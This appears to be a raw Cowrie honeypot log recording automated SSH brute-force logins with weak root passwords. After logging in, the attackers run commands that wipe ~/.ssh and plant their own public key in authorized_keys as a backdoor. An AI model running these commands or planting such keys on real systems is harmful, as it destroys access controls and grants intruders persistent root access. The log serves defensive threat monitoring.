{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:54:10.462810Z","src_ip":"212.227.235.229","session":"b44432899c12"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:54:10.711115Z","src_ip":"212.227.235.229","session":"b44432899c12"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:10.712022Z","src_ip":"212.227.235.229","session":"b44432899c12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54088,"dst_ip":"1.2.3.4","dst_port":22,"session":"615aefa6c459","protocol":"ssh","message":"New connection: 212.227.235.229:54088 (1.2.3.4:22) [session: 615aefa6c459]","sensor":"my-vps","timestamp":"2025-08-26T12:54:10.950340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:54:10.951363Z","src_ip":"212.227.235.229","session":"615aefa6c459"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:54:11.193209Z","src_ip":"212.227.235.229","session":"615aefa6c459"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:54:12.211439Z","src_ip":"212.227.235.229","session":"615aefa6c459"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:13.455945Z","src_ip":"212.227.235.229","session":"615aefa6c459"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56068,"dst_ip":"1.2.3.4","dst_port":22,"session":"08605383854a","protocol":"ssh","message":"New connection: 212.227.235.229:56068 (1.2.3.4:22) [session: 08605383854a]","sensor":"my-vps","timestamp":"2025-08-26T12:54:13.708583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:54:13.709502Z","src_ip":"212.227.235.229","session":"08605383854a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:54:13.957692Z","src_ip":"212.227.235.229","session":"08605383854a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:54:14.993266Z","src_ip":"212.227.235.229","session":"08605383854a"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:15.242085Z","src_ip":"212.227.235.229","session":"b44432899c12"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:15.244049Z","src_ip":"212.227.235.229","session":"08605383854a"}
{"eventid":"cowrie.session.closed","duration":13.079741716384888,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:22.518298Z","src_ip":"72.89.145.142","session":"f8757e12d4cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48713,"dst_ip":"1.2.3.4","dst_port":23,"session":"8fa6880fdfd8","protocol":"telnet","message":"New connection: 212.227.125.160:48713 (1.2.3.4:23) [session: 8fa6880fdfd8]","sensor":"my-vps","timestamp":"2025-08-26T12:54:34.102949Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55986,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdabd0f860b8","protocol":"ssh","message":"New connection: 212.227.235.229:55986 (1.2.3.4:22) [session: fdabd0f860b8]","sensor":"my-vps","timestamp":"2025-08-26T12:54:35.561101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:54:35.562406Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:54:35.769346Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa222222","message":"login attempt [root/Aa222222] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:54:36.630540Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:37.102858Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:54:37.103692Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:54:37.104467Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:37.308421Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:37.741026Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:54:37.742023Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:54:37.951774Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:37.952722Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57470,"dst_ip":"1.2.3.4","dst_port":22,"session":"45a56ad50312","protocol":"ssh","message":"New connection: 212.227.235.229:57470 (1.2.3.4:22) [session: 45a56ad50312]","sensor":"my-vps","timestamp":"2025-08-26T12:54:38.163032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:54:38.163776Z","src_ip":"212.227.235.229","session":"45a56ad50312"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:54:38.376160Z","src_ip":"212.227.235.229","session":"45a56ad50312"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59110,"dst_ip":"1.2.3.4","dst_port":22,"session":"a440a177a7c3","protocol":"ssh","message":"New connection: 212.227.235.229:59110 (1.2.3.4:22) [session: a440a177a7c3]","sensor":"my-vps","timestamp":"2025-08-26T12:54:38.489417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:54:38.490210Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:54:38.759081Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":39584,"dst_ip":"1.2.3.4","dst_port":22,"session":"75ddf8d0ed4a","protocol":"ssh","message":"New connection: 45.88.8.186:39584 (1.2.3.4:22) [session: 75ddf8d0ed4a]","sensor":"my-vps","timestamp":"2025-08-26T12:54:39.033889Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:54:39.287875Z","src_ip":"212.227.235.229","session":"45a56ad50312"}
{"eventid":"cowrie.login.success","username":"root","password":"Pi123456","message":"login attempt [root/Pi123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:54:39.878039Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:54:40.264873Z","src_ip":"45.88.8.186","session":"75ddf8d0ed4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:54:40.266338Z","src_ip":"45.88.8.186","session":"75ddf8d0ed4a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:40.544192Z","src_ip":"212.227.235.229","session":"45a56ad50312"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:41.064033Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:54:41.064763Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:54:41.065699Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:41.336067Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:41.936403Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:54:41.937093Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:54:42.203271Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:42.204113Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59116,"dst_ip":"1.2.3.4","dst_port":22,"session":"f490637418c5","protocol":"ssh","message":"New connection: 212.227.235.229:59116 (1.2.3.4:22) [session: f490637418c5]","sensor":"my-vps","timestamp":"2025-08-26T12:54:42.457976Z"}
